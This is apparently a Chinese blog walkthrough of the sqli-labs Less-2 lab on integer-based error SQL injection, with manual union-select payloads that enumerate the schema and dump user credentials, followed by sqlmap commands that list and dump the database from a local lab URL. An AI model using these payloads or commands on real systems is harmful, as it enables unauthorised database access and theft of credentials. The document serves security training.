【SQL注入攻击】GET-Error based - Intiger based (基于错误的GET整型注入)

hackbar

页面观察

基于intiger的注入

还是将id作为参数注入,注入id=1、2尝试一下

在这里插入图片描述

同样返回了username和password

在这里插入图片描述

判断注入点类型

注入id=1’,出现了报错

参数中输入’ 仍有报错提示,推测可能存在注入点,注入类型可能为"闭合的字符型或者整形

在这里插入图片描述

输入" (两个单引号)仍然存在报错排除"闭合的字符型注入,注入型为整型

判断数据库是否存在漏洞

注入id=1 and 1=2,为假回显为空

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ak45j7a6-1666358257179)(assets/image-20221020211540-oot6j37.png)]​

注入id=1 and 1=1,成功回显id=1的数据

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-21lNL167-1666358257180)(assets/image-20221020211613-nxahwf7.png)]​

说明在执行了id等于1的语句之后还会执行and的内容说明存在sql注入漏洞

判断字段数

?id=1 order by 4;--+

一次输入1、2、3…直到输入的为4时,就出现了报错

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ABaJs7MF-1666358257181)(assets/image-20221020211933-5y7nvy1.png)]​

说明,在这个数据库中只有三个字段

判断回显位

?id=1 and 0 union select 1,2,3 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mybAnyUm-1666358257182)(assets/image-20221020212114-9h8u0pj.png)]​

说明显示位是2,3,那么说明网页只能够显示第2、3列中信息,不能显示其他列的信息。

爆数据名

?id=1 and 0 union select 1,2,database() --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8A3ThP2Y-1666358257183)(assets/image-20221020212333-nl70kyd.png)]​

爆数据表名

?id=1 and 0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OO7HuukA-1666358257184)(assets/image-20221020212428-se3v3j6.png)]​

爆users表中的字段

?id=1 and 0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oqWBH8Ds-1666358257186)(assets/image-20221020212530-s8zsncm.png)]​

爆数据库表中的所有数据

?id=1 and 0 union select 1,group_concat(concat_ws(':',id,username,password)),3 from users --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T6MM3tpD-1666358257187)(assets/image-20221020212630-yy65q5v.png)]​

欧克,又一次成功脱库了库里的数据

sqlmap

分析漏洞类型

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch

爆数据库

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -dbs

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xI7sXPkN-1666358257188)(assets/image-20221020220208-bmwkodb.png)]​

爆数据库中的数据表

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -D security --tables

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nr3G4Wam-1666358257189)(assets/image-20221020220356-3tr6yxg.png)]​

爆数据表的字段

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -T users --columns

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UhfciJZz-1666358257190)(assets/image-20221020220533-txz4aax.png)]​

爆数据库的所有内容

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -D security -T users -C username,password -dump

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aUJArQh0-1666358257191)(assets/image-20221020220838-q6humi2.png)]​

这样就更快可以脱库了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值